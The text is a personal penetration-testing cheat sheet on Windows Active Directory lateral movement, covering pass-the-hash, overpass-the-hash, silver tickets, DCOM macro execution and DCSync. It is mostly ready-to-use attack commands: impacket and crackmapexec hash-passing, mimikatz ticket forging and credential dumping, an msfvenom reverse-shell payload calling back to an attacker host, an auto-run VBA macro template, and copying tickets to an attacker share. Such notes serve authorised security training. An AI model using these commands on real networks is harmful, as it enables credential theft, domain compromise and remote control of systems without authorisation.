Lateral movement

Pass the hash

NT LAN Manager (NTLM),which uses MD4 hashing. LAN Manager is known to be very weak since passwords longer than seven characters are split into two strings and each piece is hashed separately.

SAM file cannot be copied while the OS is running but mimikatz can dump the SAM hashes from the memory!

Pass-the-Hash
(NTLM based AuthN)

Requires user/service account to have local admin rights on target, as connection is made using the Admin$ share.
Requires SMB connection through the firewall
Requires Windows File and Print Sharing feature to be enabled.
# Method 1
$ pth-winexe -U [domain]/[username]%[blank_hash]:[ntlm_hash] //[target] [command_to_exec]
$ pth-winexe -U xor/Administrator%aad3b435b51404eeaad3b435b51404ee:08df31234567890bf6 //10.1.1.1 cmd.exe
^OR try without domain prefix in -U flag

# Method 2
$ python wmiexec.py Administrator@[target] -hashes [LM]:[NT/NTLM]
$ python wmiexec.py Administrator@10.11.1.22 -hashes [leavebankifnoLM]:ee12345067801f38115019ca2fb

# Method 3
$ python psexec.py [username]@[target] -hashes :[NT/NTLM]

# Method 4 - RDP PTH
$ xfreerdp /u:Administrator /pth:[NTLM hash] /d:[domain] /v:[target]
^If error occurs "Account Restrictions are preventing this user from signing in.” enable Restricted Admin Mode:
$ crackmapexec smb [target] -u [username] -H [hash] -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'

# Method 5 - see guide https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/
$ crackmapexec smb [target] -u [username] -H [hash] -x "whoami" 

THE BLANK LM HASH

The string “aad3b435b51404eeaad3b435b51404ee” is the LM hash for ‘no password’. In other words, its empty. Typically it could be seen at the top of a hash dump from windows and would look something like this:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:8118cb8789b3a147c790db402b016a08:::

https://yougottahackthat.com/blog/339/what-is-aad3b435b51404eeaad3b435b51404ee

overthepass

  • turns NTLM hash into a kerberos ticket and avoid the use of NTLM authentication.

  • obtain other user's NTLM hashes with sekurlsa::logonpasswords and execute the following with mimikatz.

sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:PowerShell.exe

This will open up a powershell window with the NTLM hash's user.

After that, authenticate with the net share to the domain controller

net use \\dc01 ##this authenticates the user to the domain and generates the TGT and a TGS 

and run

klist ## lists cached tickets 

Now that we have authenticated as the user, we can run PsExec.exe to launch cmd.exe remotely on the domain controller machine! (transfer the Psexec.exe if necessary)

.\PsExec.exe \\dc01 cmd.exe 

OPTH via. KALI

# [OPTION 1 TICKET RETRIEVAL] Request the TGT with hash
$ python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
$ python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
# Request the TGT with password
$ python getTGT.py <domain_name>/<user_name>:[password]
# If not provided, password is asked

# [OPTION 2 TICKET RETRIEVAL] export tickets -> copy to Kali
mimikatz> sekurlsa::tickets /export                             
cmd> copy [ticket.kirbi] \\192.168.119.XXX\share\[ticket.kirbi]
# use ticket_converter.py to convert .kirbi to .ccache
# https://github.com/Zer1t0/ticket_converter
$ python ticket_converter.py ticket.kirbi ticket.ccache

# Set the TGT for impacket use
$ export KRB5CCNAME=<TGT_ccache_file>

# execute remote commands with any of the following by using the TGT
$ python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
$ python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
$ python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Silver ticket

  • Have the NTLM hash/ password for a service account? -> you can create our own service ticket -> access he target resources! like IIS

What do we need?

  1. SID(Security Identifier)

Within this structure, the SID begins with a literal "S" to identify the string as a SID, followed by a revision level (usually set to "1"), an identifier-authority value (often "5" within AD) and one or more subauthority values.

Example:

S-1-5-21-2536614405-3629634762-1218571035-1116

Get it with

whoami /user 
S-1-5-21-2536614405-3629634762-1218571035-1116

Ignore the last part (1116: RID - identifies specific object in the domain) and take a note of "S-1-5-21-2536614405-3629634762-1218571035" which identifies the domain SID.

  • username, domain name, domain SID, host name of the service, the service type and the password hash of the service account are needed.

2. flush the past kerberos tickets generated with

kerberos::purge
kerberos::golden /user:offsec /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599479668 /target:CorpWebServer.corp.com /service:HTTP /rc4:E2B475C11DA2A0748290D87AA966C327 /ptt

Now we can abuse those silver tickets!

# abuse Silver Ticket (TGS)
cmd> psexec.exe -accepteula \\<remote_hostname> cmd   # psexec
cmd> sqlcmd.exe -S [service_hostname]                 # if service is MSSQL
# generate the Silver Ticket with NTLM
$ python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>

# set the ticket for impacket use
$ export KRB5CCNAME=<TGT_ccache_file_path>

# execute remote commands with any of the following by using the TGT
$ python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
$ python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
$ python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Distributed Component Object Model

(best work on workstations as it targets office products) - Excel, powerpoint. )

Rdesktop to the target

open powershell

Distributed Component Object Model (DCOM)

The Microsoft Component Object Model (COM) is a system for creating software components that interact with each other. (very old technologies!)

  • DCOM allows a computer to run programs over the network on a different computer e.g. Excel/PowerPoint/Outlook

  • Requires RPC port 135(com) and local admin access to call the DCOM Service Control Manager - the API.

  • The run method within DCOM allows us to execute a VBA macro remotely.

DCOM - create payload and VBA macro

# (kali) create rshell payload
$ msfvenom -p windows/shell_reverse_tcp LHOST=[kali] LPORT=4444 -f hta-psh -o evil.hta

# (python) split payload into smaller chunks starting with "powershell.exe -nop -w hidden -e
str = "powershell.exe -nop -w hidden -e {base64_encoded_payload}"
n = 50
for i in range(0, len(str), n):
print "Str = Str + " + '"' + str[i:i+n] + '"'
#this will bypass the size limit in the excel macros 
# create VBA macro -> insert into Excel file
#open excel > view > macros > name it whatever > create (save it as .xls) 
Sub AutoOpen()
    exploit
End Sub
Sub Document_Open()
    exploit
End Sub
Sub exploit()
        Dim str As String
        {insert_paysous)                    
        # OPTION 2
        # CreateObject("Wscript.Shell").Run str
End Sub

# check if document contains valid exploit macro
$ mraptor [exploit.doc]

#run the macro 
.\exceldcom.ps1 

Domain Controller Synchronization

  • steal the password hashes for all administrative users

  • move laterally to the domain controller and run mimikatz to dump hash for every user. (steal a copy of the NTDS.dit database file ---- a copy of all AD accounts stored in the harddrive ( leave access trail)

  • Domains usually have more than one DC to provide redundancy; we can request an update for an account with the IDL_DRSGetNCChanges. It only checks if we are a member of the Domain Admins group with SID.

  • we could discover more account creds in the domain.

lsadump::dcsync /user:Administrator

Last updated